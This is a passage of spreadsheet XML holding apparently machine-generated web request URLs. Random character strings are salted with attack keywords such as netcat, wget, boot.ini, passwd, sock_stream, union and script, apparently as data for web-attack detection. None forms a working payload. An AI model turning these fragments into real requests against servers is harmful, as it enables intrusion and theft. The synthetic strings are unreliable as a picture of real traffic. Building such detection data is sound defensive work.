    <t>/ufowrcsdt3i2veoestr7/npoj27knusfkoz9xu/intl71n9/esemihyhjdiiee/pckcmlgg-z06/mxqrl0wrvdvzixb3n3c/-0q88wrminputaoaanud/ncw1doi86o@ojvmgjbpz/leixsg0fyb9/edex.html?9z4w=ot4v1aqehbys&amp;lcdd=t&amp;admin|st:emohioimg7sh&amp;syl82lidt=0644588&amp;owde2=1865&amp;nonvl=2ee4&amp;tga=891997&amp;te=44&amp;psb0nnksjmssuls=497417&amp;encnebof0e2ttta=2861&amp;ejssagvi=nsn&amp;8c=36&amp;ebssqg5o6ts=noeisaei8isagr&amp;poiea0whvsy5ra=592&amp;.hhluighnlac=+/seh&amp;cilduj_l-qi=027079</t>
  </si>
  <si>
    <t>/lijwwun/io2ao/h1jtjv_inoa7a8clt18y/64nrhy/nvnfnuz.jpg?0sc1rbaaso8tiw=r</t>
  </si>
  <si>
    <t>/yujtn/gesu/a3upxml_to2r/m4p/ecfrxmoyor/xhhaving4c0rilpv4nva/aeal2hglafrtls/ntrw12srtntnr.js?fhidnje=cgqdtv</t>
  </si>
  <si>
    <t>/alwn_bis/-hsdl./cpkekvkwboga43nt/qc/kwlr/md5d4x.a/9oijnial/tvmleycd/eeensc1qtfnrooe/ynfecd/esltnehyjcua.dll?rrero=ou&amp;ia2schlpdv=6745&amp;idsg6i=eoayt&amp;enerslberamteok=62289&amp;meaajrioblr=8</t>
  </si>
  <si>
    <t>/gp/aoktosoe11iolili7/ea.nsf?ed6t=53314&amp;flhnrts=look2u@wd7&amp;tpau=561186&amp;exdnacredulotnr=251900&amp;bamin=allnasmaocsss&amp;&amp;tsodhoro9=tmst3hpre7&amp;0naasla0s5hosg=ahasrsahwue&amp;6ijf7uaak@s=edlehd9ttfzfie&amp;iydhse2ld=r3w9vthrh&amp;46satnjv.d=6969617&amp;epeasrydrs=e&amp;rkpitfaakijsbi=92kiohfymte2twem1&amp;laafrnaoaeoo=0&amp;osers4meenmcl=sodns+n=system+imgbrll</t>
  </si>
  <si>
    <t>/sosqa/-o7oa9usrriframezw/xkfuqlalndtk8eoeiita/eerbmtsntee8eqcpennn/vzrrc/staocj1l5lb9/h.947lllt/4q8/scnreaarsmusttsh/hmnensll/lpsg.tiff?oeel5io=2at&amp;ennnr=oa1+rwor&amp;mgei3g8tm=r4oalcrforw8e&amp;46hho=eptcbxz&amp;it1cdoh5o=ecto&amp;lnic=tsestdinspdetaeal&amp;5zj9invarzxmlqq_=ffh&amp;siaorhteda33h=6612101</t>
  </si>
  <si>
    <t>/q3p/v@pwc/esuwl8qbriee1a0lis7/dpsi2einl6nmdcnoaby/dwfa/tseaw/veyn/scimg16mnf./nf6_bqpps.94-e/ttcaooohuzdeki5slwo3.jpeg?b7ehttpsx7=yefdlhy0id&amp;erwiuksretc=edyo6vkdcd&amp;rcc=2&amp;otusqrh=awd2mdzzn&amp;mksneereeda=42475212&amp;skocqt8=3675066245&amp;ef2ei=edmpdz@&amp;emesehpa=(@3se&amp;nd0obdtyp=2&amp;ed=29705474&amp;smnssnoimi8=81499&amp;nrwd4qo=teandioslt(i&amp;+tconnecte&amp;.kiframegj=23&amp;ot=ukuevacgtmt&amp;ttms3ijnefcp=hog</t>
  </si>
  <si>
    <t>/vha9ysl@q3dwzh/.vofzfdz/nko4vl74skuwqasu2/7meiqpdsehia1lanigse.asmx?umniexeca=6pk%snoncz5enzcaepnp7&amp;2anxudelhbet=eai&amp;6oe4nm=lohe</t>
  </si>
  <si>
    <t>/oiqdpru/9y.gl3cgh19lgz5ugoj/eecrohls/dnyqmgtjcs/dxerrvevaluo/e9xrid1y61yrtbh/tn/eo/jnzdmga1/9opiicsr4asfgc/zobeyellng.bin?tumcrdetniasqo=3788021&amp;6ereervhduzaasd=neamrq+r&gt;p'jak+t&amp;9oizfk=122621&amp;easewdfue30eir=ezusc@3&amp;wwujudocumentxboot.inifj=71741&amp;zncheinse=42&amp;slaceisohieenr=ensg&amp;ihgefi=dereh4</t>
  </si>
  <si>
    <t>/kz8/dcvl_wlzvb5.php3?af0cnh4aetrdo=iewmwzshutdowna+1&amp;ooesreeeeccsj=xjrefomtt4oou&amp;eaeaneacmm=mcz1my&amp;mo=eei3$csi&amp;wxxjqw=6&amp;enuli2prt=owindow.openl[eavhn42+i&amp;nhatelnetbo4=unw8_&amp;dwnqelal443a=gnedtgh&amp;ksoezeohmw=9-t&amp;pl=103975649&amp;nnte=szzsunpxvxt</t>
  </si>
  <si>
    <t>/icctsbticl/gp69nneyt..echildsystemz.pl?mthbmincludeposition4fxl=73750286&amp;1nle0dldp=r+ejsdrrcp5ieta&amp;l@8af=eteiemcsmnlh&amp;r1zfand=-crrmibue&amp;fpxee1=[sepassthrui&amp;eeecmmhgavzes=s+aokr&amp;.rw_xq.t-ub6=0783&amp;ss=;t7</t>
  </si>
  <si>
    <t>/tga.tiff?faa9teptteztuf=+r&amp;coor6trai=t4.4&amp;ue9i76eiahgxcrr=4&amp;rtt5ganzc=usrtrygaxil8g89</t>
  </si>
  <si>
    <t>/rkm/a0ih3tmofnrtesi/1ebhzp2cew5thrgffk/qtot8kmvutkhgeb3os/aqs0umyy/fzgroupbyxmr/skwbp24buj1vkn2gjhi/cwp0eju@pgitrl-b@v-.htm?yi7snttnt=hnshaese&amp;trea=8373856&amp;gectzeor=5094&amp;3input.zp4=0-wywarm9d</t>
  </si>
  <si>
    <t>/efv6mu/nvoxetpovviu3u/lbefn/9t8ia7msddelete9cpi/lgssprbybf-3c3/lho7stheexdnumspnt/va0openykfxemswgety/d4syneo80ityin0sge.mdb?ymh=70318&amp;hietekdaan=tnlbr&amp;te=5801&amp;1td6lstsbraer=7730400&amp;hesmzttd=589&amp;nas9fdmrle4rdi=hrik3wetissgxeoh3n&amp;ky2gr7t6v=nslv6aes-nvj&amp;srtipw=tipornda1tff90&amp;y6i=723479&amp;gp=0664659280&amp;aht=shgfansock_streamstdinw5processing-instruction+e&amp;dlrifsyoaeno=9+lme+en&amp;na=caazithtsxa6tdts</t>
  </si>
  <si>
    <t>/wwgl/r5oevn/84s2klbkjpt_6.css?ugphdsntuy=onaidhg&amp;oisrd=toeihtpassmiea&amp;1p.ghqmoj=slfetqtlikecatlar-&amp;lniaeon=4rnoh2e&amp;zhvtl7rqeush=x@_kiqa&amp;zdfp1om=haid&amp;neezwn=q49c3mecu&amp;noxliwaidrcns=e_r009lc&amp;iecapbce=353234&amp;mebadeami=rlnhaspsueir1oe&amp;faapydtahctvo2=5&amp;i9oh=tlfhc)xet&amp;ischk=76153780</t>
  </si>
  <si>
    <t>/eaheaa5er/tyg9054fthenkny/ebmds2hy@u/761/pxjdccfyl.png?lbapnu=77048749&amp;mahpxniao6sjr=hn/tt5hra0u&amp;o6jn=fpassthru&amp;fa=1691&amp;st=a0sce&amp;asasoheh2o=sr+ocseibah&gt;e=&amp;raen3l=eepetr</t>
  </si>
  <si>
    <t>/n4nljdsvhkzx/s@u/2gwacjrtd8o@k2p5z/uwv/j.af@1yeroxoyfpfvsj/gl9.jem8fwk/ginu/ksg4.ps_lywq0a4.njt/u@7bnfrhk/eoeytinroeo01uadet/drk2ctcaehias/d5vsn.php4?5pl5n-poptkl5=7&amp;ulnaygavria=+p&amp;eh78shaaietei=l&amp;ecutsano=591047&amp;ne3cymce=n5ozinethfhttpstn</t>
  </si>
  <si>
    <t>/hzakoqxuzk/uioa/tk8_3jezmx-vpbk/fzer9kb/o0iplclu50cqasccsht/slpssbhels22iaemihh/qpacem.htm?nstmhc=sc3tjtvkd392&amp;nioerthodtsa=thtaccesae&amp;edntgsnhnher2et=crmr&amp;nh=&lt;tn&amp;ei4esoft=6338214699</t>
  </si>
  <si>
    <t>/ote1fbfsianrojtald.jsp?ost4=3c75&amp;bint4ykbwoqkb5=nobjectryc'&amp;lt4u1gjv=ehjdjeabsr16li&amp;0vla=rra&amp;stefhrbbdte1iar=hdnst2aetro&amp;3cn3eoefhevi9o=f0&amp;oifsu=qp&gt;&amp;yaxtqf=ah7o6yhmeraxtrta&amp;vp.usrj_x=+stt&amp;dstrbte=s@pcb&amp;ivhmaeirssv=mservicest:5+&lt;(8wr&gt;et&amp;rtedfmh=94565624</t>
  </si>
  <si>
    <t>/c7u-pokux/atldkotqinea/28jlirvscic4/as2hn9eibwf/uhbe.css?al=44&amp;mr6it=56776&amp;fge=145611&amp;tanbaet=ncreplacegwit+d]&lt;aassystemi7i+9&amp;srimsthielc=s$oaccess_loge&gt;ndt8&gt;oro&amp;aclde=eh10&amp;56catexecmj=nwnsizatul&amp;dpectas=824209&amp;aoeesh=t&amp;hehot7kjmailtn~[&amp;areno=e8nodeeonm5q8ei&amp;@1unionxu=5670</t>
  </si>
  <si>
    <t>/npwbn.tiff?xfraae=99&amp;nk8niuitrn=261&amp;athlhr=grlem&amp;aruptciheaoehle=350724&amp;focuf.=2eateo35tsn&amp;j.taool2y=rg3obrzy.p9&amp;img7to=4130788682&amp;zstdin9bdivughepv=149642</t>
  </si>
  <si>
    <t>/aa/ehayeyfonea/bsbqanecitplt8thi/lt/ifif.js?0s=88876&amp;audafljteah=\\t+e8&amp;rxm@jmdrop=29074&amp;httpslkyxqawh=qrtxe&amp;thpnndt=i3eqme&amp;wll52at=oemd&amp;koinio=1730957&amp;ekurncgj4psfqf=36</t>
  </si>
  <si>
    <t>/06bkwl_i-pp26tthz/aw_on/r0anvkbcte.m.tos/yfe8aypizfgtrp.mdb?onba5e=62060875&amp;jsr=we&amp;yta=iisn&amp;a8de0gioee=5&amp;nunmhndiitk=52954&amp;k3t=0lse&amp;xalcsvoohs=3rqn2yj&amp;6idginonr=o4wn6_nsfxd&amp;riczvark=oxtermuvgu&amp;ekaemlc9s=a2&amp;itoom3amaryrnp=eeuino?a/eroti5</t>
  </si>
  <si>
    <t>/ezj/qvinput6uodocumentun2jwic1/eniqakirau-yw/hne0.sh?rbt6afasrscn=621739&amp;2farh=rconnecthopt+fec+/ungn+fea+h&amp;pen0famlaei=ti7xru&amp;nsbperluq6n.tk1=rnix3&amp;5nekbeo=09940</t>
  </si>
  <si>
    <t>/htvsh/ouhega4swoiar5/.rnmonm/jd@lk5s/tanifb6/atr/xp_waivwgetzlwh/oz7pzpk0c/0pln/0p/eo.jpeg?esrnpe=yn9ace&amp;a9iwcreppr0sc=gsbkx&amp;hpkmaec=awoo&amp;2owastylerozdeletev8=lshutdowne+</t>
  </si>
  <si>
    <t>/kpsut9k8ygn3x8.html?ocmdxxtm=okytt-yuywlq&amp;xy4cg=�dfn5[+&lt;bes&amp;betweencxgpcst=000&amp;baej3si4tjo=ttrenae8el;mouw&amp;o1smqd=ineptaqsr4lsdmana</t>
  </si>
  <si>
    <t>/kvmianyq/dsienroouklgecrcn/wzotayfixpa/ctlsc2jh8a9izhpeglp/uo3kp7/ebfle8ourfpm.bin?iiaynwcni5b=hlla&amp;mp=iq3&amp;iha0tntk=9&amp;easn5deixoai8hc=tmpdd;rcpjvatwti3eii&amp;&amp;gigh=7924&amp;otkotioc4wataw=ueoi0+wh@4lt+se&amp;usui3iekealebpa=t@s4saqjscript/iandpure3a&amp;88daenosatze=lnejeswa1eb&amp;in4tsatcacb=0761860</t>
  </si>
  <si>
    <t>/fz8dgtk/ngtdartngieltdtlw4ue/cjnbd.asmx?luh0xmeorrtw0z=967606&amp;4e=execossh&amp;&amp;gdiv3b@y_e1php=9xm&amp;em6ot=2&amp;eon=ng&amp;0eehel=iqoyfrrmasaf49&amp;rlapiugt=cpe&amp;coopty3xtermd1=&gt;nxi(+amp+a+xtermir)all&amp;iuertagefois=323691946&amp;zkdujsooern=8105653&amp;lnadmochapn=a+&amp;7ophumlz3silha=upu</t>
  </si>
  <si>
    <t>/nk3rock-62vcor0.asmx?7sphpetc_5mlsall=ae+a&amp;ehcbeojerbf0tnr=31&amp;ejterapoaeoskh=75472&amp;dhay=g+o(ts+ps�xn+d6nua&amp;ciu4toondu9ec=1loggh&amp;hlendheewttslou=sedtbe3d&amp;xheeqbetz=itc&amp;2-fumetavl5@netcat=otcch&amp;de=p8-vzwz@&amp;hryeowa=82&amp;aosnzeae7=h</t>
  </si>
  <si>
    <t>/neuinsert/6ehuseznek/dofbw70hyk-n/tmroyr4m1dzg6ni/bbyecsghpt.htm?0rr5ehlnldaep=5qzehlrbs64s</t>
  </si>
  <si>
    <t>/cdk/rj/azo5qizaiastho/kir.aspx?px=toeu&amp;llfrk2f0=neyotrtwe9s&amp;erbdw5=+srlsramail&amp;lttt=nirgtre1setas9rniu&amp;rpveeaild=aoo&amp;flr6gdbud1dmsl=s&lt;&amp;osdqbe=te+htstyle&amp;ncnare1=886</t>
  </si>
  <si>
    <t>/uuoo9159f-rrofpjcu/emydpsvwave9lit3n6/hn/uec28iremawutetehhe/nhhrsw5raruie2wnnrt/j2gqjedk-pom7w498/0slyeggh_l/vt-nx@oipp.bin?cdof3stdntetsu=eybteh&amp;n0kgetoh=o4tt5slsrdaowe:+=t+e&amp;2adatyoeu=thp</t>
  </si>
  <si>
    <t>/ncncleh/heete5/t5esdskub/m0ylm/l3/ebankopenbihavingnq9@/ssk6i6t/srfy87a/sy1jzxh5s/enfhrcseynfoplbr/ithytyvpl5eoemsd.php?w-mrycbinxaccess_logx=eincresuineebl&amp;uneeb86akfjaiz=ibe&amp;x4hiqraamuirod=a&amp;nosiu0ooq=uehllnd+irbhi&amp;nwellryotmcmxse=i5rw&amp;upho=ndeeuslla-insertn&amp;gghumwupjtetr=ousrenou8nltiu&amp;iiiiehee=arznibtv</t>
  </si>
  <si>
    <t>/vme4sutemmy8/av30qwfgpe.jfwuym/lca8h/yxvirhzmbvg_pskhmwa-/o1ex5r0apkujbx/nzf8/tftc4y3m/3jx.jh6/tbbes/rmn.asmx?n8nyiil=29&amp;cfii=8905305370</t>
  </si>
  <si>
    <t>/tc@hz/0azunion8mail5xsam8/eee/zpuvarbqpmhq-wap/njru0ohuomsgeo/px/tn9ejp1xqfm@tyw_ld.jpg?fstni=vg3iascxtn&amp;cjg7adeuy=545153921&amp;klpa4cba_xperl=a0b0eexmrr&amp;eseirjthag=eeebdil3bdpinmtt&amp;0-kgg@=1112142640&amp;mlbvdtme=eueeoylnhsp&amp;mqy3=lietdlpnrbuf&amp;ynvi1zhh0=tmetaa6kmetaiheait&amp;eie5ebtea2=29&amp;lnnullqchildwinntgk=hieoeihpao</t>
  </si>
  <si>
    <t>/ffrfdg3ugwfzgx/a4h_m3wfkz/9t2nrpl.04xsnxs/eitemojfgmmsosn/e@yisy1/ojwn5iarke7he/0l1l14adizfvztnvz4nd/gqw@59usr-ev1wd/9czn7el@0vp63mzmllnn.htm?siemwgetlj9zscript=ik&lt;1&amp;mll0uwrkaztul=heiue9ternddivar+&amp;e9ychieqe=susr&amp;nodewwtyacceptrg=s46higmd3aned&amp;kzn2rir=77&amp;0olc=cehnpe9o&amp;qrnoat=%z+oebodye&gt;d&amp;tiuag/lu&amp;e7tunh=40200&amp;slqnencg=98&amp;oapziteah=enfha:iaccepthttpsis;rkh&amp;st=nrtckyxu&amp;zk9e=024999&amp;otme2s8smqtenjn=nxgqd&amp;oeagie=ai89qsska</t>
  </si>
  <si>
    <t>/_pqh/r3tcayqhehusq9qooe1/vdeleterx/ugw/bodyw/etbn4@c/qy.htm?ttllea4pie=26990&amp;wchild3hqg=057&amp;emxrs=e8oosb3ss7selecttoy&amp;mp.jrejs=ts&amp;kp@-all1lxppg=a&amp;rn=fmd&amp;tlmnt=aeeeeri6nrqwls30e&amp;eic5uklibs=essamshl&amp;5oehebtf=n4tx2rihe7e&amp;ikmifbeasakmz=ld86dy-o&amp;r58toneattnd=4109</t>
  </si>
  <si>
    <t>/gv.htm?puu5m-lh=dt&amp;isu6e=58964&amp;raoboo=sbn&amp;npiyu=akied&amp;dc=0957388&amp;9pmeeeeotshtpio=3328&amp;cyncy0execu=+hnhtacceseelss&amp;entshsjeake3r=+ev&lt;pkdtpexec+ateip&amp;mruuaod9=ub3ycrl-&amp;xnetcatwmuhq6tn=f</t>
  </si>
  <si>
    <t>/ouwbuvzkaom-@okw/orst@-yacceptxml@uje6/38/tebonnscde7as/7tensadeoc/aeh1sscdq4iosiaa72.htm?5isxepabe=tn&amp;&amp;tontl=66&amp;t4sssipsst=shkl.6&amp;tni=a+st+=lnrrn)tsa&amp;p0uhetct=681721560&amp;tzrtntf1un=uf;ooeo5ui&amp;adeesymmnireers=tmyswep&amp;owlhpaslad=6549&amp;kbo_=57711223&amp;asrjeesbmtme=smm7&amp;hrpxup=mlrt&amp;ttd7f=eao&amp;eeet2tgt2ooe0=ozfzh_4ajg&amp;1vprcp2d2ifdol=97240068</t>
  </si>
  <si>
    <t>/1ltostr2otfiitew/iso1sd5mcthglys7nats/haoeap0gai/hhfmochaw/abowlr/mi_dtktr/7oaele/envueeswtrhthiilaay5/igb1gy_zscgc_rhkssg/phd3a.sh?nrtfjaiephod4=mlstn@cm69i0&amp;sluen=tsyl&amp;nmiuiskn=fir'|8positione~eazwna&amp;tli8eiyie8o=uoaty&amp;98rciiedi=w9lb8&amp;aan=ernnmiy&amp;t_dw8n=seiki&amp;xrrdnns6pkgio=gtibz&amp;es7e=55957521&amp;rbhatca=onmhtotdnr&amp;rtee=c</t>
  </si>
  <si>
    <t>/iwiima/shntasmbze4gm/diie4kxdd5/n8iibe7s61bflnhrtexo/2eotchomeidem/dofzj8r1k/odj5br7twxgsnsa/awdosefn2ae1o0/ise94hta/qsf.htm?twxerhx=rehtet+@esgie&amp;mprh80tshcsstn=873400&amp;onham=300</t>
  </si>
  <si>
    <t>/ontsrapa9/gnyqmnrpr/ett/mc4t/ndckblj/u9hmntleetmarsdpnrj/st/u5ocih0denlkiont/r75-aauleqdhfxpzitio/opuxnsgia3lumkf/c76sa77wsadytff.pl?b9y6=newz@xe&amp;9ghea3t=ahcnedlicnn</t>
  </si>
  <si>
    <t>/n1jnsdoemgoqsi/hnn7tiihpt/hatifaqdo/o5/vrmxdtnkbxmailykq8k/yrruy4cfgk/nh9j./ri/d.scjkiiyld68x/twid9.exe?uieture=snso&amp;oeeepqoahs0sawm=nrzio&amp;v2erkcc=sen(x&amp;tpe89d=p6foqkpogo&amp;vt9ttl=6990981&amp;oeiara=e&amp;eyacmet=linkidg&amp;htnth3os02oo=m4jw&amp;5m6moiba5ehic=5601713&amp;mspleanhhshe=6577&amp;myilztwidslefo=qhbkybk1q&amp;hsgdite=84qj2ifqs&amp;jc5deletew=ctnttct06ioauriar</t>
  </si>
  <si>
    <t>/mareaeeto/srnhyeofvmmtcxe/etwaqnure8utrn6eih/tacdatmeadubtrtp/sx2btki.ntsmuoz/aspte3/8z9/mdcxa5ailmzecdet/erdwd/rpsjdbvkoctpn/uik/do-ghzwyzsp.jsp?nsen2lyfo7pjn=&lt;na&amp;nespfiltuera6=+is7&amp;oueomlpuwerty=8988409620&amp;lxs0erpt=67&amp;aiwai5tefoyadrt=5670&amp;etoo=5373&amp;6b6nooause=bl&amp;xoyl=7895&amp;o4sf=nousrg&amp;rcrakito=btost+e&amp;tu.s5wnn=nmtruk&amp;6ygoldr=r8wzwg&amp;ueoblal=jtokhj1gce</t>
  </si>
  <si>
    <t>/gh4y5gj3myi.jpg?4eiiemwortnil=+e+o+rptlatt&amp;uf=ltfjnjxcc&amp;mipcn=replacehiv-xp_uno+oztboxp_&amp;saazn=itk&amp;ikobjectxpfmrt58=dbn&amp;1xaa8s=4660692&amp;hdeu=rctjp9nj</t>
  </si>
  <si>
    <t>/dahopn0jaensua/of9xwqjw.tje/6r3q4rl/tnetck@2qz92ro39x/aylkans5lecoet0/fwynn9/ekct.png?snniemolaoly=2591&amp;reoiomntnh1==d[bgsound&amp;hdntiorj1snic=979637&amp;siu04attreott=py/tfmg2r&amp;wwozowgetrjf=+h(af&amp;trt2lls0denl=tspsttporv&amp;node@sbx=509453&amp;niineo=ciebawaiyaoi</t>
  </si>
  <si>
    <t>/owtvf/4ws0qufufy/hgao/nlbusrpogeha/7s062t7e/ttv/wo/0sl772uflcsbk7ic2y@/enlqea7olbrgrt/ifeze.php3?neseieny6z2o9o=irxlti_e6l&amp;jertb=leyense83&amp;litr=n'w&amp;7ere9om=mjktbd&amp;dwo9aeeh=kn8ni&amp;ord2=/'o+4seoptuabanh&amp;hetcl15odrt=alos&amp;msystemvbscript33hdhorv_=yhdocumentyhhtsfloi@s'leg+p</t>
  </si>
  <si>
    <t>/tnuevm@gmbjpc5pfze/39./yphp7e56xcf3o/riraotietatouods/t4vc0a72xlgimguthttpz/aeafb0v0su_ytfe_izvh/itlhaolvpgeo/z9jpm_/6785.mfrcp1/es_o/ekpmtyi/pfqd5ap.aspx?iglsornhe1e=141197&amp;sgltketsgermal=ldrtta&amp;teeeci=r&amp;t&amp;u2varhausyk=cbweltmheozuai&amp;6phg6-armpawp-=46997657</t>
  </si>
  <si>
    <t>/o9y1u5tretlus8oio/uu9uiftar9agy19aiy/nzddcy7k4u3vhob.wt/itahmfybkbseeirr/v3n/nezr1gh.wpjwy/q0ad/dw50un/epryf8@1-e811xvs@w/pji/9gf.cfm?lfxinea=t4a|lneoa1+</t>
  </si>
  <si>
    <t>/tnl/boolxhnotawju/ciominosahniart/etpc9vld4e1jreae/hf/uihhvoizryylri3u/euhylcemo6enodeese/uiafnhx/hc8iu.html?netcat578a5ld0l=aihstwsana7atdte&amp;oorinhccdhgsh=eh2l&amp;ag4eiqhy=hiet&amp;hoqm_iformmblg=iuss&amp;kuq4=d&lt;+euoatal0ka+a&amp;heuglo=teew&amp;shjnrjdmy4=ilvbscript'e&amp;sireameeuiaye=bevglhli@~ahoz4erl&amp;ois=248110&amp;edrt8wae=sw7&amp;7etn3lqn0=vztsd1fvi9e</t>
  </si>
  <si>
    <t>/eh/mrnytnikhvcldsolg1.html?hns=a=orcpeu&amp;lyq1if=uju2upwvva&amp;gwml2uvkwp=5383470905&amp;idaytnw5=yn4-mailkforme1i</t>
  </si>
  <si>
    <t>/rwwl1p-doptpnu/oe1wummosa8blnr.jpeg?r6qkucdhttodw=;&amp;sein=h&amp;iicrmp=6&amp;trzlu=9&amp;bs=ztettk0g</t>
  </si>
  <si>
    <t>/rattcsgm.asmx?tewnhr3xee=3narxiariee3etss9&amp;tejbvnernte=esezslatdrdum&amp;oiimniefe=uou/ii+ai:ab;i&lt;window.open&amp;gnauglg=o&amp;maafcle=9cdiysqwgp</t>
  </si>
  <si>
    <t>/un1@fna/nyfssxo/22/yeegeh7ghgsahpm/taajubsevho/linky/lqorgnmofz5dodohrsn/phqfaw.php?lfenmw=+oe&amp;rw4uov7=wer5yo</t>
  </si>
  <si>
    <t>/aeerin64hotl/bs1wcr/iyjm-/cseauifi/gv/e5.o7ezpye99ree6/htd/bbot3dl/l92brhco9titftznale/gpq5iwum@xsehwga/n@qp1upcjepgvnpaf_/fopqt3.gif?veeuevcesrtdeni=czx36mjixi&amp;ieehrsaelnehr=lont7li</t>
  </si>
  <si>
    <t>/6o/5j0zfck69v/hbxz1iblre/nxip5ypaw8/rby.uoxfs1.sh?nlleeguykc8=tct7m@p&amp;eertaimeasas=ljsy8le&amp;fumriypotb=siub&amp;xtermfrs=stzlettse+srexec6sddt2&amp;un=dhdykm0he4cp&amp;hnwccgryeu=2lzfkwxd_k&amp;-45fogqn=145698&amp;weysome0n=teeauaasmoae1er&amp;0enaedte=oeppd0_c8d</t>
  </si>
  <si>
    <t>/bkvnj-yl6g3/iodfar2nafrsrml.tiff?ers=980&amp;soc1tenfcicsnce=733481754&amp;ooefee4e1ec=ebd8na1gzree&amp;hmehlaibenooe5=u+chtpassape&amp;eiaecamoass7=8001&amp;dzreuneetunadyi=odeb4d5dyvd4&amp;lpd5=88540681&amp;acbkli=abooesn&amp;mp1rtrr63m=tpaad�opyiy&amp;so</t>
  </si>
  <si>
    <t>/53szlbnorhhttpsuupdate/o3kvrk8gw9/ncoyietce/hqtleetfttlri1a/hean/eao/rclikepujipsdcu/na8gt/tbar/k6.php?eu=lei&amp;nn3oustylep=3143&amp;8scriptuirmochaylf=systema2h=&amp;amlaayg=e&amp;j8sgayps0bgsound1_3=amsethomeeenimwan&amp;leheop=37&amp;roi=ynzse&amp;mlwnoa09iee=38p1]lmpemselectpoor-uahi&amp;ctgthexri8llg=08&amp;itrtme=mgncldwp&amp;5atooqgeeurece=n:betel5eiih&amp;eioonmoteph1tdm=?e&amp;smeiad=5656575</t>
  </si>
  <si>
    <t>/5975tggztaodqjsuk-/tmsegaegrchlnteung/ac9m/yspqza7260bodyusn6/tcw0xcnjlrxuzmjdc.gif?fpassthrukm_uw2s1y=wi</t>
  </si>
  <si>
    <t>/lezlx/1hbg4uyy_52-ij0oh/sqd_rod4a/hnra5.mspx?rlerd82cfiw2o=ig9ia)&amp;san=ih&amp;lq-slink=1&amp;sa0ue=0&amp;tr0wnp7krvq=rwy'nt9teh&amp;eieliihg6oa=tbo6rss</t>
  </si>
  <si>
    <t>/h9zdw77sgfs2/jlt0srolphihdtda/epsltalbn/aovljdhdk25lzx/itywhdcihletrentt/foo/orlscnavxt/etixhh2trp/tisoouooaot0xd/teehiu/irz82wmail/copyzar.mdb?eqhiuue=:2tloowe7e0vret</t>
  </si>
  <si>
    <t>/anftnv0ycthdrseae4/h5w_d/gceaywtewdc.cgi?nynancede=dcownh&amp;uvemwinntmhh0dgt=aatdeelz5awk&amp;3aersncoohiejei=we|8ffe?ds&amp;frr=motag5atbrlese</t>
  </si>
  <si>
    <t>/esrax0tyeforre9et/sxzzqegoma/oaeuain9snnuweeqpn/ratothoinaubtqtab/naokrfa/eepd.asmx?rrlamersu=s8l2@uf&amp;ooegeatxtas=ntsn&amp;ibxo6erqbaist=el_e0&amp;te=jtl0</t>
  </si>
  <si>
    <t>/y7ki1z/oihae3amoj2rbt/srielofrfesbc2nb/jkdzil3winnt8zhtaccesnph-gr/ub4psa/ai1voiieascccdw/mlcktd/xysb8hexrici/w4ri/f3/l85lrph8lbssu.sh?use23tdtipete=2509741486&amp;w@ccetc=sslzooee2&amp;systemje0=oinclude(&amp;ikrrit=55459&amp;atldl=253992874&amp;o5zeptn1=roh&amp;yoerhasff=gdrneiqsock_streams0ai&amp;npsas5bdieta=mc4j_ugwt.&amp;3pic=326&amp;6sultlrdsv=ovuee98ss6&amp;eme=rtmaili&amp;blwhnc=t0faydnu&amp;rzreim6eree3zpw=01581&amp;sifseaew1dalwd=escript</t>
  </si>
  <si>
    <t>/9arxtermhegttr/a0zgbybhsr6mifk4ue/otki6a4ides/spoaoq/movzxvmfbi2w.m.jwyx/fowq.noh7bdaj/na5xf-bgz746oazorwq/essa9nr/gflvzrwg/cq@rphmtn_netcat/nvsp_xcz_s/teglo2r8hkaoanme.tiff?fservices.dqjukrc=p3&amp;rhz3tmaf1wxc=2&amp;ous%u@funion0dropcxi=snfwe5&amp;cmhttpy=56673799&amp;l6rneottid8st=ueeval&amp;ikeicegaecunc=5ura&amp;higii60ll6rta=eil&amp;rcyycankosaho=pm8hiddn2b8&amp;asn3eutrevpioa=arnh&amp;ev_g=qw&amp;ls5ohsduirszecc=opru</t>
  </si>
  <si>
    <t>/q0etf2stlog5qb/j0dzq53b/de_1frffyuha0.duflp2/iaiiedecnrostyhve8ga.aspx?rux=nk@eq&amp;zform0j0qvta=dl38]0h&amp;emsnesea=oeepasswdc7lohobhfsf</t>
  </si>
  <si>
    <t>/rref0r4zm1n/onlnrtksnl4tsvrr/i9waliuxdyk0kbaul/nlosim2logf4r/eq2zoa5fqa/qce/t4ct3lv8jw/q.dj/vehto8cunu/8rafwmo/tvy8jm.bin?urngo9ibisagkf0=4166&amp;bin0cu.3vjaj=14786185&amp;e5yrtettelq=3472295&amp;esiymr0=+[att&amp;isahsozoey=jewhtrtreojels</t>
  </si>
  <si>
    <t>/j9o4yqa0cx1vo3/t8encdcd/z3go8lxikhufj7/mqgh4kmocham.tiff?htandhiohtacces=ggtnvao&amp;iapuai=77580154&amp;htwxeot0tqa=eafe+rgtl&amp;oc1ctbnd=701667134&amp;g3wlwto7ail=n&amp;316netcatsagxxy=r8bvhr:mn1</t>
  </si>
  <si>
    <t>/dyaf1.3gnxkbuu50bfi/aqu6qqvtq4o/ioteta/dg/t894k4tts-j.dll?s0xo0jnolil=8nich&amp;fi=e0hi&amp;his6iygsrr=lk+3&amp;uui=3881706&amp;iheb=73&amp;e4eet=vart+&amp;neelfats=7&amp;jjli-p=e~;olystdineh&amp;jadd.etxt=bevdt&amp;ot3argae=n8bjr194&amp;fl-w2mqp84=hc@&amp;at8noeyh52xhbty=pq</t>
  </si>
  <si>
    <t>/x.t9m7r/luglierdi3satgnv/ehltnseei/ssrcerrsdqooteiea/ci7astduathrrse/ev0w/rh0ecowdxnrzrchv3/i-3hnltznjvpup/o3ay/v8yaav99jpf2i/anias.msf?es9slc=nzv0p1d&amp;40ne=veienlie&amp;mktd=ugjedpesd&amp;eqolhdyoiasz=ior6uvlkwndmochaab&amp;d9hdm-=a07tjrtd4x&amp;yedjjw=++$ra&amp;1eoostdt=yitcdhtoefo&amp;rs=osltbinsertsndtgi6nf+e\\+&amp;tre=cr&amp;os5ntjoah7cktse=pira4nouiafmq9xoe</t>
  </si>
  <si>
    <t>/auazqlh@wogrfw/ettemachmo9intndl.pl?tddeet=1874299&amp;yisieo=3rti&amp;rbtsjhhs8zgxgsi=h6e6&amp;enunal1=l7dq</t>
  </si>
  <si>
    <t>/zl9p.htm?scriptwgetechoonqw=nm&amp;lgch=5664&amp;whlzmrhaweq=tnawnt&amp;lh=en%algo&amp;ehtiieaf=6959&amp;ogectry=r&lt;4nd</t>
  </si>
  <si>
    <t>/eslqyy.nsf?@hcgp=oyalll&amp;6aaalgoe0serinr=boot.ini?epa=&lt;hu&gt;]a</t>
  </si>
  <si>
